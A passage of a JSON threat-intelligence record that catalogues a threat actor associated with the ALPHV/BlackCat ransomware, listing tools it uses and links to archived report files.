				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434534,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.pdf",
		"text": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.txt",
		"img": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.jpg"
	}
}